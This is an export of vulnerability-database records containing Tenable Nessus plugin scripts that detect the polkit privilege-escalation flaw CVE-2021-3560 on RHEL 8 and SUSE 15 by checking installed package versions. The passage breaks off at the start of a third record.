{"lastseen": "2023-08-02T14:51:18", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2021:2237 advisory.\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-06-03T00:00:00", "type": "nessus", "title": "RHEL 8 : polkit (RHSA-2021:2237)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-24T00:00:00", "cpe": ["cpe:/o:redhat:rhel_aus:8.2", "cpe:/o:redhat:rhel_e4s:8.2", "cpe:/o:redhat:rhel_eus:8.2", "cpe:/o:redhat:rhel_tus:8.2", "p-cpe:/a:redhat:enterprise_linux:polkit", "p-cpe:/a:redhat:enterprise_linux:polkit-devel", "p-cpe:/a:redhat:enterprise_linux:polkit-docs", "p-cpe:/a:redhat:enterprise_linux:polkit-libs"], "id": "REDHAT-RHSA-2021-2237.NASL", "href": "https://www.tenable.com/plugins/nessus/150161", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:2237. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150161);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/24\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"RHSA\", value:\"2021:2237\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"RHEL 8 : polkit (RHSA-2021:2237)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2021:2237 advisory.\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-3560\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:2237\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1961710\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit-libs\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'eq', os_version: os_ver, rhel_version: '8.2')) audit(AUDIT_OS_NOT, 'Red Hat 8.2', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu && 'ppc' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/aus/rhel8/8.2/x86_64/appstream/debug',\n 'content/aus/rhel8/8.2/x86_64/appstream/os',\n 'content/aus/rhel8/8.2/x86_64/appstream/source/SRPMS',\n 'content/aus/rhel8/8.2/x86_64/baseos/debug',\n 'content/aus/rhel8/8.2/x86_64/baseos/os',\n 'content/aus/rhel8/8.2/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.2/ppc64le/appstream/debug',\n 'content/e4s/rhel8/8.2/ppc64le/appstream/os',\n 'content/e4s/rhel8/8.2/ppc64le/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.2/ppc64le/baseos/debug',\n 'content/e4s/rhel8/8.2/ppc64le/baseos/os',\n 'content/e4s/rhel8/8.2/ppc64le/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.2/ppc64le/highavailability/debug',\n 'content/e4s/rhel8/8.2/ppc64le/highavailability/os',\n 'content/e4s/rhel8/8.2/ppc64le/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.2/ppc64le/sap-solutions/debug',\n 'content/e4s/rhel8/8.2/ppc64le/sap-solutions/os',\n 'content/e4s/rhel8/8.2/ppc64le/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.2/ppc64le/sap/debug',\n 'content/e4s/rhel8/8.2/ppc64le/sap/os',\n 'content/e4s/rhel8/8.2/ppc64le/sap/source/SRPMS',\n 'content/e4s/rhel8/8.2/x86_64/appstream/debug',\n 'content/e4s/rhel8/8.2/x86_64/appstream/os',\n 'content/e4s/rhel8/8.2/x86_64/appstream/source/SRPMS',\n 'content/e4s/rhel8/8.2/x86_64/baseos/debug',\n 'content/e4s/rhel8/8.2/x86_64/baseos/os',\n 'content/e4s/rhel8/8.2/x86_64/baseos/source/SRPMS',\n 'content/e4s/rhel8/8.2/x86_64/highavailability/debug',\n 'content/e4s/rhel8/8.2/x86_64/highavailability/os',\n 'content/e4s/rhel8/8.2/x86_64/highavailability/source/SRPMS',\n 'content/e4s/rhel8/8.2/x86_64/sap-solutions/debug',\n 'content/e4s/rhel8/8.2/x86_64/sap-solutions/os',\n 'content/e4s/rhel8/8.2/x86_64/sap-solutions/source/SRPMS',\n 'content/e4s/rhel8/8.2/x86_64/sap/debug',\n 'content/e4s/rhel8/8.2/x86_64/sap/os',\n 'content/e4s/rhel8/8.2/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.2/aarch64/appstream/debug',\n 'content/eus/rhel8/8.2/aarch64/appstream/os',\n 'content/eus/rhel8/8.2/aarch64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.2/aarch64/baseos/debug',\n 'content/eus/rhel8/8.2/aarch64/baseos/os',\n 'content/eus/rhel8/8.2/aarch64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.2/aarch64/codeready-builder/debug',\n 'content/eus/rhel8/8.2/aarch64/codeready-builder/os',\n 'content/eus/rhel8/8.2/aarch64/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.2/aarch64/highavailability/debug',\n 'content/eus/rhel8/8.2/aarch64/highavailability/os',\n 'content/eus/rhel8/8.2/aarch64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.2/aarch64/supplementary/debug',\n 'content/eus/rhel8/8.2/aarch64/supplementary/os',\n 'content/eus/rhel8/8.2/aarch64/supplementary/source/SRPMS',\n 'content/eus/rhel8/8.2/ppc64le/appstream/debug',\n 'content/eus/rhel8/8.2/ppc64le/appstream/os',\n 'content/eus/rhel8/8.2/ppc64le/appstream/source/SRPMS',\n 'content/eus/rhel8/8.2/ppc64le/baseos/debug',\n 'content/eus/rhel8/8.2/ppc64le/baseos/os',\n 'content/eus/rhel8/8.2/ppc64le/baseos/source/SRPMS',\n 'content/eus/rhel8/8.2/ppc64le/codeready-builder/debug',\n 'content/eus/rhel8/8.2/ppc64le/codeready-builder/os',\n 'content/eus/rhel8/8.2/ppc64le/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.2/ppc64le/highavailability/debug',\n 'content/eus/rhel8/8.2/ppc64le/highavailability/os',\n 'content/eus/rhel8/8.2/ppc64le/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.2/ppc64le/resilientstorage/debug',\n 'content/eus/rhel8/8.2/ppc64le/resilientstorage/os',\n 'content/eus/rhel8/8.2/ppc64le/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.2/ppc64le/sap-solutions/debug',\n 'content/eus/rhel8/8.2/ppc64le/sap-solutions/os',\n 'content/eus/rhel8/8.2/ppc64le/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.2/ppc64le/sap/debug',\n 'content/eus/rhel8/8.2/ppc64le/sap/os',\n 'content/eus/rhel8/8.2/ppc64le/sap/source/SRPMS',\n 'content/eus/rhel8/8.2/ppc64le/supplementary/debug',\n 'content/eus/rhel8/8.2/ppc64le/supplementary/os',\n 'content/eus/rhel8/8.2/ppc64le/supplementary/source/SRPMS',\n 'content/eus/rhel8/8.2/s390x/appstream/debug',\n 'content/eus/rhel8/8.2/s390x/appstream/os',\n 'content/eus/rhel8/8.2/s390x/appstream/source/SRPMS',\n 'content/eus/rhel8/8.2/s390x/baseos/debug',\n 'content/eus/rhel8/8.2/s390x/baseos/os',\n 'content/eus/rhel8/8.2/s390x/baseos/source/SRPMS',\n 'content/eus/rhel8/8.2/s390x/codeready-builder/debug',\n 'content/eus/rhel8/8.2/s390x/codeready-builder/os',\n 'content/eus/rhel8/8.2/s390x/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.2/s390x/highavailability/debug',\n 'content/eus/rhel8/8.2/s390x/highavailability/os',\n 'content/eus/rhel8/8.2/s390x/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.2/s390x/resilientstorage/debug',\n 'content/eus/rhel8/8.2/s390x/resilientstorage/os',\n 'content/eus/rhel8/8.2/s390x/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.2/s390x/sap/debug',\n 'content/eus/rhel8/8.2/s390x/sap/os',\n 'content/eus/rhel8/8.2/s390x/sap/source/SRPMS',\n 'content/eus/rhel8/8.2/s390x/supplementary/debug',\n 'content/eus/rhel8/8.2/s390x/supplementary/os',\n 'content/eus/rhel8/8.2/s390x/supplementary/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/appstream/debug',\n 'content/eus/rhel8/8.2/x86_64/appstream/os',\n 'content/eus/rhel8/8.2/x86_64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/baseos/debug',\n 'content/eus/rhel8/8.2/x86_64/baseos/os',\n 'content/eus/rhel8/8.2/x86_64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/codeready-builder/debug',\n 'content/eus/rhel8/8.2/x86_64/codeready-builder/os',\n 'content/eus/rhel8/8.2/x86_64/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/highavailability/debug',\n 'content/eus/rhel8/8.2/x86_64/highavailability/os',\n 'content/eus/rhel8/8.2/x86_64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/resilientstorage/debug',\n 'content/eus/rhel8/8.2/x86_64/resilientstorage/os',\n 'content/eus/rhel8/8.2/x86_64/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/sap-solutions/debug',\n 'content/eus/rhel8/8.2/x86_64/sap-solutions/os',\n 'content/eus/rhel8/8.2/x86_64/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/sap/debug',\n 'content/eus/rhel8/8.2/x86_64/sap/os',\n 'content/eus/rhel8/8.2/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.2/x86_64/supplementary/debug',\n 'content/eus/rhel8/8.2/x86_64/supplementary/os',\n 'content/eus/rhel8/8.2/x86_64/supplementary/source/SRPMS',\n 'content/tus/rhel8/8.2/x86_64/appstream/debug',\n 'content/tus/rhel8/8.2/x86_64/appstream/os',\n 'content/tus/rhel8/8.2/x86_64/appstream/source/SRPMS',\n 'content/tus/rhel8/8.2/x86_64/baseos/debug',\n 'content/tus/rhel8/8.2/x86_64/baseos/os',\n 'content/tus/rhel8/8.2/x86_64/baseos/source/SRPMS',\n 'content/tus/rhel8/8.2/x86_64/highavailability/debug',\n 'content/tus/rhel8/8.2/x86_64/highavailability/os',\n 'content/tus/rhel8/8.2/x86_64/highavailability/source/SRPMS',\n 'content/tus/rhel8/8.2/x86_64/nfv/debug',\n 'content/tus/rhel8/8.2/x86_64/nfv/os',\n 'content/tus/rhel8/8.2/x86_64/nfv/source/SRPMS',\n 'content/tus/rhel8/8.2/x86_64/rt/debug',\n 'content/tus/rhel8/8.2/x86_64/rt/os',\n 'content/tus/rhel8/8.2/x86_64/rt/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'polkit-0.115-11.el8_2.1', 'sp':'2', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.el8_2.1', 'sp':'2', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-docs-0.115-11.el8_2.1', 'sp':'2', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.el8_2.1', 'sp':'2', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var subscription_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in the Red Hat Enterprise Linux\\n' +\n 'Advanced Update Support, Extended Update Support, Telco Extended Update Support or Update Services for SAP Solutions repositories.\\n' +\n 'Access to these repositories requires a paid RHEL subscription.\\n';\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = subscription_caveat + rpm_report_get() + redhat_report_repo_caveat();\n else extra = subscription_caveat + rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit / polkit-devel / polkit-docs / polkit-libs');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T15:51:52", "description": "This update for polkit fixes the following issues :\n\nCVE-2021-3560: Fixed a local privilege escalation using polkit_system_bus_name_get_creds_sync() (bsc#1186497).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : polkit (SUSE-SU-2021:1843-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libpolkit0", "p-cpe:/a:novell:suse_linux:libpolkit0-debuginfo", "p-cpe:/a:novell:suse_linux:polkit", "p-cpe:/a:novell:suse_linux:polkit-debuginfo", "p-cpe:/a:novell:suse_linux:polkit-debugsource", "p-cpe:/a:novell:suse_linux:polkit-devel", "p-cpe:/a:novell:suse_linux:polkit-devel-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-polkit", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2021-1843-1.NASL", "href": "https://www.tenable.com/plugins/nessus/150257", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2021:1843-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150257);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : polkit (SUSE-SU-2021:1843-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for polkit fixes the following issues :\n\nCVE-2021-3560: Fixed a local privilege escalation using\npolkit_system_bus_name_get_creds_sync() (bsc#1186497).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1186497\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3560/\");\n # https://www.suse.com/support/update/announcement/2021/suse-su-20211843-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8bbd1370\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE MicroOS 5.0 :\n\nzypper in -t patch SUSE-SUSE-MicroOS-5.0-2021-1843=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP3 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP3-2021-1843=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP2 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP2-2021-1843=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpolkit0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpolkit0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-Polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP2/3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"libpolkit0-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"libpolkit0-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"polkit-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"polkit-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"polkit-debugsource-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"polkit-devel-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"polkit-devel-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"typelib-1_0-Polkit-1_0-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libpolkit0-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libpolkit0-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"polkit-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"polkit-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"polkit-debugsource-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"polkit-devel-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"polkit-devel-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"typelib-1_0-Polkit-1_0-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"libpolkit0-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"libpolkit0-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"polkit-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"polkit-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"polkit-debugsource-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"polkit-devel-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"polkit-devel-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"typelib-1_0-Polkit-1_0-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libpolkit0-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libpolkit0-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"polkit-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"polkit-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"polkit-debugsource-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"polkit-devel-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"polkit-devel-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"typelib-1_0-Polkit-1_0-0.116-3.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"polkit\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T15:52:07", "description": "This update for polkit fixes the following issues :\n\nCVE-2021-3560: Fixed a local privilege escalation using 